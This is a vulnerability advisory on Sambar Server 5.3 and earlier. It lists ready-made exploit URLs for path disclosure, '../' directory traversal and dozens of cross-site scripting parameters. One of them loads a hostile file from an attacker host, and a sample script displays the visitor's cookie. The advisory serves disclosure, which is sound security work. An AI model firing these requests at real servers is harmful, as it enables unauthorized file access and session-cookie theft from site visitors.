________________________________________________________________________ Security Corporation Security Advisory [SCSA-012] ________________________________________________________________________ PROGRAM: Sambar Server HOMEPAGE: http://www.sambar.com/ VULNERABLE VERSIONS: 5.3 and prior ________________________________________________________________________ DESCRIPTION ________________________________________________________________________ "Sambar Server is the new standard in high performance multi-functional servers with features rivaling other commercial products selling separately for several hundreds of dollars. It's Winsock2 compliant Win32 integration functions on Windows 95, Windows 98, Windows NT, Win2000, and XP as a service or as an application." (direct quote from http://sambar.jalyn.net) DETAILS & EXPLOITS ________________________________________________________________________ ¤ Path Disclosure : Sambar default's installation of the CGI bin directory contains a testcgi.exe and a environ.pl that allows remote users to view information regarding the operating system and web server's directory. These vulnerabilities can be triggered by a remote user submitting a specially crafted HTTP request. - Exploits : http://[target]/cgi-bin/environ.pl http://[target]/cgi-bin/testcgi.exe Will produce the following output: - environ.pl : -------------- Sambar Server CGI Environment Variables GATEWAY_INTERFACE: CGI/1.1 PATH_INFO: PATH_TRANSLATED: C:/sambar53/cgi-bin/environ.pl QUERY_STRING: REMOTE_ADDR: 127.0.0.1 REMOTE_HOST: REMOTE_USER: REQUEST_METHOD: GET DOCUMENT_NAME: environ.pl DOCUMENT_URI: /cgi-bin/environ.pl SCRIPT_NAME: /cgi-bin/environ.pl SCRIPT_FILENAME: C:/sambar53/cgi-bin/environ.pl SERVER_NAME: localhost SERVER_PORT: 80 SERVER_PROTOCOL: HTTP/1.1 SERVER_SOFTWARE: SAMBAR CONTENT_LENGTH: 0 CONTENT: - testcgi.exe : --------------- Test CGI ... Version 1.00 [ build date 8-03-97 ] QUERY_STRING PATH_INFO PATH_TRANSLATED C:/sambar53/cgi-bin/testcgi.exe SCRIPT_NAME /cgi-bin/testcgi.exe SCRIPT_FILENAME C:/sambar53/cgi-bin/testcgi.exe DOCUMENT_ROOT C:/sambar53/docs/ HTTP_USER_AGENT Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) REMOTE_ADDR 127.0.0.1 REMOTE_HOST SERVER_NAME localhost SERVER_PROTOCOL HTTP/1.1 SERVER_SOFTWARE SAMBAR CONTENT_TYPE ---------------------------- ¤ Directory Disclosure : Other security vulnerabilities was found in Sambar which allow an attacker to reveal the content of the files and the directories on the web server, even if it should not be revealed. These vulnerabilities can be simply exploited by requesting a specially crafted URL utilizing iecreate.stm and ieedit.stm application with a '../' appended. - Exploits : http://[target]/sysuser/docmgr/iecreate.stm?template=../ http://[target]/sysuser/docmgr/ieedit.stm?url=../ ---------------------------- ¤ Cross Site Scripting : Many exploitable bugs was found on Sambar Server which cause script execution on client's computer by following a crafted url. This kind of attack known as "Cross-Site Scripting Vulnerability" is present in many section of the web site, an attacker can input specially crafted links and/or other malicious scripts. - Exploits : http://[target]/netutils/ipdata.stm?ipaddr=[hostile_code] http://[target]/netutils/whodata.stm?sitename=[hostile_code] http://[target]/netutils/findata.stm?user=[hostile_code] http://[target]/netutils/findata.stm?host=[hostile_code] http://[target]/isapi/testisa.dll?check1=[hostile_code] http://[target]/cgi-bin/environ.pl?param1=[hostile_code] http://[target]/samples/search.dll?query=[hostile_code]&logic=AND http://[target]/wwwping/index.stm?wwwsite=[hostile_code] http://[target]/syshelp/stmex.stm?foo=[hostile_code]&bar=456 http://[target]/syshelp/stmex.stm?foo=123&bar=[hostile_code] http://[target]/syshelp/cscript/showfunc.stm?func=[hostile_code] http://[target]/syshelp/cscript/showfncs.stm?pkg=[hostile_code] http://[target]/syshelp/cscript/showfnc.stm?pkg=[hostile_code] http://[target]/sysuser/docmgr/ieedit.stm?path=[hostile_code] http://[target]/sysuser/docmgr/ieedit.stm?name=[hostile_code] http://[target]/sysuser/docmgr/edit.stm?path=[hostile_code] http://[target]/sysuser/docmgr/edit.stm?name=[hostile_code] http://[target]/sysuser/docmgr/iecreate.stm?path=[hostile_code] http://[target]/sysuser/docmgr/create.stm?path=[hostile_code] http://[target]/sysuser/docmgr/info.stm?path=[hostile_code] http://[target]/sysuser/docmgr/info.stm?name=[hostile_code] http://[target]/sysuser/docmgr/ftp.stm?path=[hostile_code] http://[target]/sysuser/docmgr/htaccess.stm?path=[hostile_code] http://[target]/sysuser/docmgr/mkdir.stm?path=[hostile_code] http://[target]/sysuser/docmgr/rename.stm?path=[hostile_code] http://[target]/sysuser/docmgr/rename.stm?name=[hostile_code] http://[target]/sysuser/docmgr/search.stm?path=[hostile_code] http://[target]/sysuser/docmgr/search.stm?query=[hostile_code] http://[target]/sysuser/docmgr/sendmail.stm?path=[hostile_code] http://[target]/sysuser/docmgr/sendmail.stm?name=[hostile_code] http://[target]/sysuser/docmgr/template.stm?path=[hostile_code] http://[target]/sysuser/docmgr/update.stm?path=[hostile_code] http://[target]/sysuser/docmgr/update.stm?name=[hostile_code] http://[target]/sysuser/docmgr/vccheckin.stm?path=[hostile_code] http://[target]/sysuser/docmgr/vccheckin.stm?name=[hostile_code] http://[target]/sysuser/docmgr/vccreate.stm?path=[hostile_code] http://[target]/sysuser/docmgr/vccreate.stm?name=[hostile_code] http://[target]/sysuser/docmgr/vchist.stm?path=[hostile_code] http://[target]/sysuser/docmgr/vchist.stm?name=[hostile_code] http://[target]/cgi-bin/testcgi.exe?[hostile_code] - An other Cross Site Scripting can be exploited with a remote file where's include the hostile code like this : http://[target]/sysuser/docmgr/ieedit.stm?url=http://[attacker]/hostile_file .htm The hostile code could be : [script]alert("Cookie="+document.cookie)[/script] (open a window with the cookie of the visitor.) (replace [] by <>) SOLUTIONS ________________________________________________________________________ No solution for the moment. VENDOR STATUS ________________________________________________________________________ The vendor has reportedly been notified. LINKS ________________________________________________________________________ - http://www.security-corp.org/index.php?ink=4-15-1 - Version Française : http://www.security-corporation.com/index.php?id=advisories&a=012-FR ------------------------------------------------------------------------ Grégory Le Bras aka GaLiaRePt | http://www.Security-Corporation.com ------------------------------------------------------------------------